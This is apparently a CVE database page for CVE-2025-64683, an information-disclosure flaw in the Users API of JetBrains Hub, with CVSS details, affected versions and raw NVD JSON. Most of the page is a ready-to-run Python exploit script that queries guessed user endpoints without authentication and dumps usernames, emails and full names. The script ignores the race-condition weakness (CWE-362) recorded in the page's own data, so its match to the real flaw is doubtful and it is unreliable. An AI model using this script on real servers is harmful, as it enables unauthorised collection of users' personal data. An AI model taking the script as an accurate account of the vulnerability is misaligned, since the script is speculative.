Security Vulnerability Report
中文
CVE-2025-64683 CVSS 5.3 MEDIUM

CVE-2025-64683

Published: 2025-11-10 14:15:44
Last Modified: 2025-11-21 16:09:49
Source: [email protected]

Description

In JetBrains Hub before 2025.3.104432 information disclosure was possible via the Users API

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains Hub < 2025.3.104432

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-64683 PoC - JetBrains Hub Users API Information Disclosure # Target: JetBrains Hub < 2025.3.104432 # Author: Security Researcher # Date: 2025-11-10 def check_vulnerability(target_url): """ Check if target JetBrains Hub instance is vulnerable to CVE-2025-64683 """ print(f"[*] Checking target: {target_url}") # Target Users API endpoint endpoints = [ "/api/users", "/rest/user/users", "/api/v1/users" ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"\n[*] Testing endpoint: {url}") try: # Send unauthenticated request to Users API response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: try: data = response.json() if data and (isinstance(data, list) or 'user' in str(data).lower()): print(f"[+] VULNERABLE! Information disclosure detected at {url}") print(f"[+] Response preview: {json.dumps(data, indent=2)[:500]}") return True except: pass elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint requires authentication (HTTP {response.status_code})") else: print(f"[-] Unexpected response (HTTP {response.status_code})") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[-] Target does not appear to be vulnerable to CVE-2025-64683") return False def exploit_information_disclosure(target_url): """ Exploit CVE-2025-64683 to extract user information """ print(f"\n[+] Exploiting CVE-2025-64683 on {target_url}") url = target_url.rstrip('/') + '/api/users' try: # Unauthenticated request to Users API response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: users = response.json() print(f"\n[+] Successfully retrieved {len(users)} user records:") for i, user in enumerate(users, 1): print(f"\n[User {i}]") print(f" Username: {user.get('username', 'N/A')}") print(f" Email: {user.get('email', 'N/A')}") print(f" User ID: {user.get('id', 'N/A')}") print(f" Full Name: {user.get('fullName', 'N/A')}") return users else: print(f"[-] Failed to retrieve users (HTTP {response.status_code})") return None except Exception as e: print(f"[-] Exploit failed: {e}") return None if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-64683.py <target_url>") print("Example: python cve-2025-64683.py https://hub.example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target) # Uncomment to extract user data: # exploit_information_disclosure(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64683", "sourceIdentifier": "[email protected]", "published": "2025-11-10T14:15:43.760", "lastModified": "2025-11-21T16:09:48.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains Hub before 2025.3.104432 information disclosure was possible via the Users API"}, {"lang": "es", "value": "En JetBrains Hub antes de 2025.3.104432 la revelación de información era posible a través de la API de Usuarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.3.104432", "matchCriteriaId": "8A004A90-824E-4528-AEF7-F000D4C968FB"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.